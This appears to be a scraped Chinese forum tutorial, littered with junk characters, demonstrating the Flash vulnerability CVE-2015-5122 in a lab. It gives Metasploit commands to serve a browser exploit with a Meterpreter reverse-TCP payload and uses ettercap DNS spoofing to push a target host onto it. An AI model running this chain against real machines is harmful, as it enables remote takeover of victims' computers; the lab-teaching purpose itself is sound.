; Y: D& q4 F4 o9 o# L 二、cve2015-5122漏洞实例演示虚拟机
8 p P j1 Z/ {: `, y( e% d : p% d) \' i$ x9 a
3 f) `/ A! X) h! U
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
( ]0 E$ T6 b$ \2 Z/ x# E
8 e4 a' K8 h' A7 y$ E7 A$ n
9 J9 e6 k0 d$ @! B, a( C search cve-2015-5122如图: 3 q9 W8 m: @' ~3 D* B
: N! E8 k: @# U0 \' b
# M7 }. i1 D7 H# ? / H; k& I5 y7 P: \1 ^* X- t
- h: _% @# j8 I! k. D8 ?
0 J) y. E+ s( V1 ^, P 下面我们敲如下命令:
& u }& j% j% s% _5 u; h% T4 ] ; h! h4 c, I. e y6 c: p! e
5 y0 e* @# Z4 o use exploit/multi/browser/adobe_flash_opaque_background_uaf 0 [# y% U4 C! W
: f1 I, M! C7 @2 U9 }9 P- M! w8 k: T7 E. `5 l3 V, L
set PAYLOAD windows/meterpreter/reverse_tcp " I! M9 }# V6 m5 e
$ M' \! p) ?4 q3 \. ?9 Y$ V3 ^$ f5 N5 @# s s/ X
set LHOST 192.168.0.109 6 _3 k8 f4 p# R K2 i" @! r
4 I5 O1 }- E$ J+ w& F9 l ^$ Q
! F. _) N: C+ K
set URIPATH / /*根目录*/ " T7 A& ~! S' k# ~2 J
% Y1 A3 ^) H1 [. R M# D
; X g i G; p: w0 j6 A* n
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
" R7 G) b z0 i4 n. D0 J
- q/ O# @% k! d( ~
, F9 R$ F" E+ M n2 [6 x2 ~8 l set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
( F# z W5 t8 H* C' K3 {9 Y ! I# |* n o# a7 P
( \- L T+ h& m" K0 f$ f: y* \6 T' u 然后show options如图:
( w L: Z' Q! r) H ) J0 v4 k: ]& q/ y
+ ?7 B+ a" E1 G
$ m0 _: t. @7 P2 q/ E, [$ ]
O1 R8 _; E v, j2 @# q
! r1 U; X* Z2 [3 @2 T# B' j6 b
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: 6 [' V! h& s/ }& b6 Y
. I: T; n1 X* ~ H7 l/ b
: H8 F5 r4 G, T* n% I
( s* w! Z Z* a# t6 A. A
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
* m4 S8 @* Z/ Z0 z% c4 S
* t. m; _0 a6 d! J5 Q; n5 I7 V! N7 B8 {
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 7 D8 R3 H2 T, p
7 P6 X* B& [' Z% ?1 P4 v% W
/ G- _0 @. x) F7 ]; w6 U. c$ b, o " G: M) |( J; _+ b6 G# u) m
1 j4 S$ d/ [3 {' J* ~3 d' x# ?5 I- L
成功了,这时候我们断开ettercap,如图: 4 O! J& m: i. Z% P
$ O5 o3 x! _2 _) ~% x0 f
5 B; [ F7 O$ w3 b
& \% N7 i& g) s5 ?# j/ o . G0 G2 _7 H _+ | h
. Q( ?0 }: y- y4 ? V Screenshot如图:
\" G+ n: m' D2 v6 m) V
* u' j* T$ l1 Q. G
' |0 h! H* b z( m& S 1 k. o' K& M/ q4 I4 h
1 R Y: Q4 C- g) R; w% {
, y; c5 U4 E" L
, P0 G" E/ N. @. \, [! n% I
|